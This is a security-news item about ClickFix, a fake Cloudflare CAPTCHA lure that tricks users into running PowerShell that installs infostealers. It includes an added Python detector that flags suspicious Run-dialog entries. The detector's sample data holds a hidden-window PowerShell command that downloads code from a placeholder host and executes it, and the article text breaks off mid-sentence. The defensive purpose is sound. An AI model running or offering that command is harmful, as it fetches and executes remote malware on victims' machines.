Cloudflare CAPTCHA Page Tricks Users Into Downloading Malware

An advanced but simple phishing tactic is circulating that uses fake Cloudflare CAPTCHA pages to target users with malware.

Recent research by SlashNext says the technique, called ClickFix, tricks users into running commands that deploy malware. ClickFix shows a fake version of Cloudflare’s Turnstile CAPTCHA page. It replicates the visual layout and technical elements such as the Ray ID identifier to look authentic.

Prompt that users generally miss

The phishing site is hosted on a domain that looks like the real one, or on an authentic website that has been attacked. When users visit the site, they are tricked into checking a box labeled “Verify you are human.”

This step looks normal and doesn’t raise any suspicion, but afterwards users are asked to carry out a series of steps: “Win + R,” then “Ctrl + V,” and finally “Enter.” These steps look harmless, but they run a PowerShell command. Once executed, it can extract malware such as Lumma, NetSupport Manager, and Stealc.
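One way to check a workstation for the Win + R step described above, as an added example that is not from the article or from SlashNext: Windows records commands typed into the Run dialog per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so an exported copy of that key can be triaged for PowerShell launches. The function name, the heuristics and the sample values are assumptions constructed for illustration.

```python
import re
from typing import NamedTuple

class Finding(NamedTuple):
    value_name: str
    command: str
    reasons: list

# Heuristics below are assumptions of this example, not indicators from the article.
INTERPRETER = re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b")
SIGNALS = {
    "hidden window": re.compile(r"(?i)-w(in(dowstyle)?)?\s+(h(idden)?|1)\b"),
    "encoded command": re.compile(r"(?i)\s-(ec?|en\w*)\s"),
    "network fetch": re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b"),
    "dynamic execution": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "embedded URL": re.compile(r"(?i)https?://"),
}

def triage_runmru(values):
    """values: RunMRU value name -> value data, as exported from the registry.

    Returns a Finding for every Run-dialog entry that starts PowerShell and
    also shows at least one signal. A bare 'powershell' entry is not flagged.
    """
    findings = []
    for name, data in values.items():
        if name.lower() == "mrulist":  # ordering string, not a command
            continue
        # Run-dialog entries are stored with a trailing "\1" marker.
        command = data[:-2] if data.endswith("\\1") else data
        if not INTERPRETER.search(command):
            continue
        reasons = [label for label, rx in SIGNALS.items() if rx.search(command)]
        if reasons:
            findings.append(Finding(name, command, reasons))
    return findings

# Constructed sample export (not real data; example.invalid never resolves).
SAMPLE = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "powershell\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/v | iex"\\1',
}

if __name__ == "__main__":
    for f in triage_runmru(SAMPLE):
        print(f.value_name, f.reasons, f.command)
```

A hit is a lead for investigation, not proof: administrators do start PowerShell from the Run dialog, so review flagged entries alongside process-creation logs for the same user and time.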

According to security expert Daniel Kelley, “ClickFix is a social engineering attack that tricks users into running malicious commands on their own devices – all under the guise of a routine security check.” ClickFix is dangerous because it uses standard security measures as attack tools.

Experts call this “ve

[…]

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
